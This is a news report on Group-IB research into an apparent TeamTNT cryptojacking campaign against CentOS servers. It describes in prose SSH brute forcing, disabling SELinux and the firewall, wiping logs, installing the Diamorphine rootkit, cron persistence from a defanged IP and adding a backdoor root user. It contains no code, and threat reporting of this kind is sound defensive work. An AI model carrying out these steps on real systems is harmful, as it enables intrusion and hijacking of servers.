New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

The cryptojacking operation known as TeamTNT has likely returned as part of a new effort targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.

"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le Phuong stated in a Wednesday study.

The malicious script, the Singaporean cybersecurity business stated, is responsible for deactivating security measures, erasing logs, terminating bitcoin mining activities, and impeding recovery attempts.

The attack chains finally pave the way for the implementation of the Diamorphine rootkit to mask malicious processes, while also setting up permanent remote access to the infected system.

The campaign has been linked to TeamTNT with intermediate confidence, given parallels in the tactics, methods, and procedures (TTPs) observed.

TeamTNT was first identified in the open in 2019, doing illegal cryptocurrency mining operations by entering cloud and container environments. While the threat actor said goodbye in November 2021 by claiming a "clean quit," public reporting has identified multiple campaigns launched by the hacking squad from September 2022.

The current action related to the group appears in the form of a shell script that first checks whether it was previously infected by earlier cryptojacking activities, following which it proceeds to degrade device security by disabling SELinux, AppArmor, and the firewall.

"The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service," the researchers claimed. "If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service."

Besides eliminating any competing cryptocurrency mining processes, the script takes measures to run a series of commands to delete traces left by other miners, stop containerized processes, and remove images distributed in association with any coin miners.

Furthermore, it achieves persistence by establishing cron tasks that download the shell script every 30 minutes from a remote server (65.108.48[.]150) and altering the "/root/.ssh/authorized_keys" file to add a backdoor account.

"It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities," the researchers stated. "The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration."